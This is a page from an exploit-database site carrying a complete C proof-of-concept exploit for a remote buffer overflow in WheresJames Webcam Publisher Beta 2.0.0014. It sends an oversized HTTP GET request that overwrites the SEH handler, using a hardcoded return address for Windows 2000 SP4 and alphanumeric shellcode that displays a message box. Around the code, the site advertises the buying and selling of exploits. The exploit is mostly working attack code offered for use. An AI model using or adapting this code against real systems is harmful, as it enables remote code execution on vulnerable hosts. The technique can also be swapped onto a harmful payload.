0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WheresJames Webcam Publisher Beta 2.0.0014 Remote Buffer Over
================================================================= WheresJames Webcam Publisher Beta 2.0.0014 Remote Buffer Overflow ================================================================= /* * WheresJames Webcam Publisher Beta 2.0.0014 POC (www.wheresjames.com) * * * Bug and Exploit by : Miguel Tarasc? Acu?a - Haxorcitos.com 2005 * Tarako AT gmail.com - Tarako AT Haxorcitos.com * * Platforms tested: * * - Windows 2000 SP4 Spanish * - Probably All Windows 2000 versions * * * Exploit Date: 15/April/2005 * * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * * Greetings to: #haxorcitos, #dsr and #localhost @efnet * * * Little Explanation: * * Buffer must only have bytes between 0x20 and 0x7A, this limits you to use * a generic shellcode. * I created a harcoded MessageBoxA alphanumeric Shellcode to run with this POC * Also the offset referenced by the Call ECX SEH handler overwriten, must contain * only bytes between 0x20 and 0x7A * * 77F69B9F 8B4D 18 MOV ECX,DWORD PTR SS:[EBP+18] * 77F69BA2 FFD1 CALL ECX * * stack * 00000000 * 00000000 * XXXXXXXX <-- EBX points to HERE (XX >= 0x20 && XX <= 0x7A) * YYYYYYYY <-- This DWORD overwrites the SEH handler (the flow is taken in the CALL ECX) * 00000000 * 00000000 * */ #include <winsock2.h> #include <stdio.h> #pragma comment (lib,"ws2_32") #define TIMEOUT 1 #define TOPHEADER "GET " #define MIDDLEHEADER "\nHost: " #define BOTTOMHEADER "\nUser-Agent: User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0)\n\ Accept: */*\n\ Accept-Language: es\n\ Accept-Encoding: gzip,deflate\n\ Keep-Alive: 100\n\ Connection: keep-alive\r\n\r\n" #define BUFFERLEN 5000 char shellcode[] = // little harcoded alphanumeric "shellcode" // haaaaX5aaaaP[H-,F3T--F3U5!@z!ShkitohTaraTZSSRSSP? "\x68\x61\x61\x61\x61" // PUSH 61616161 ; "\x58" // POP EAX ; EAX = 61616161 "\x35\x61\x61\x61\x61" // XOR EAX,61616161 ; EAX = 00000000 "\x50" // PUSH EAX ; "\x5B" // POP EBX ; EBX = 00000000 "\x48" // DEC EAX ; EAX = FFFFFFFF "\x2D\x2C\x46\x33\x54" // SUB EAX,5433462C ; EAX = ABCCB9D3 "\x2D\x2D\x46\x33\x55" // SUB EAX,5533462D ; EAX = 569973A6 "\x35\x21\x40\x7A\x21" // XOR EAX,217A4021 ; EAX = 77E33387 USER32.MessageBoxA (Win2kSP4) "\x53" // PUSH EBX ; "\x68\x6B\x69\x74\x6F" // PUSH 6F74696B ; ASCII "kito" "\x68\x54\x61\x72\x61" // PUSH 61726154 ; ASCII "Tara" "\x54" // PUSH ESP ; "\x5A" // POP EDX ; ASCII "Tarakito" "\x53" // PUSH EBX ; 0 "\x53" // PUSH EBX ; 0 "\x52" // PUSH EDX ; Tarakito "\x53" // PUSH EBX ; 0 "\x53" // PUSH EBX ; 0 "\x50" // PUSH EAX ; MessageBoxA "\xC3"; // RETN struct { char *name; long offset; } supported[] = { // 0x72712F5E (clbcatq.dll 2000.2.3511.0) -> 83C108 = ADD ECX,8 + FFD1 = CALL ECX {"Windows 2000 Pro SP4 Spanish", 0x72712F5E }, {"Crash", 0x41414141 } },VERSIONES; /******************************************************************************/ void ShowHeader(int argc,char *argv[]) { int i; printf("\n WheresJames Webcam Publisher Beta 2.0.0014 Buffer Overflow POC\n"); printf(" Exploit by Miguel Tarasco - Tarako [at] gmail [dot] com\n"); printf("\n Windows Versions:\n"); printf(" ---------------------------------------------\n"); for (i=0;i<sizeof(supported)/sizeof(VERSIONES);i++) { printf(" %d) %s (0x%08x)\n",i,supported[i].name,supported[i].offset); } printf(" ---------------------------------------------\n\n"); if (argc<4) { printf(" Usage: %s <IP> <Port> <Option>\n",argv[0]); exit(1); exit(1); } } /******************************************************************************/ void main(int argc, char *argv[]) { SOCKET s; WSADATA HWSAdata; struct sockaddr_in sa; char *buffer=NULL; ShowHeader(argc,argv); if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { printf("\n [e] Error: WSAStartup():%d\n", WSAGetLastError()); exit(1); } if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ printf("\n [e] Error: socket():%d\n", WSAGetLastError()); exit(1); } sa.sin_family = AF_INET; sa.sin_port = (USHORT)htons(atoi(argv[2])); sa.sin_addr.S_un.S_addr = inet_addr(argv[1]); if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) { printf("\n [e] Error: connect()"); exit(1); } printf(" [i] Connected : Yes\n"); printf(" [i] Target : %s\n",supported[atoi(argv[3])].name); buffer=(char*)malloc(strlen(TOPHEADER)+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+1+strlen(argv[2])+strlen(BOTTOMHEADER)+1); memset(buffer,0,sizeof(buffer)); memcpy(buffer,TOPHEADER,strlen(TOPHEADER)); memset(buffer+strlen(TOPHEADER),'A',BUFFERLEN); memcpy(buffer+strlen(TOPHEADER)+1052,&supported[atoi(argv[3])].offset,sizeof(long)); memcpy(buffer+strlen(TOPHEADER)+1060,shellcode,strlen(shellcode)); memcpy(buffer+BUFFERLEN,MIDDLEHEADER,strlen(MIDDLEHEADER)); memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER),argv[1],strlen(argv[1])); memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1]),":",strlen(":")); memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+strlen(":"),argv[2],strlen(argv[2])); memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+strlen(":")+strlen(argv[2]),BOTTOMHEADER,strlen(BOTTOMHEADER)); send(s,buffer,strlen(buffer),0); printf(" [i] Buffer sent\n\n"); closesocket(s); } # 0day.today [2024-12-24] #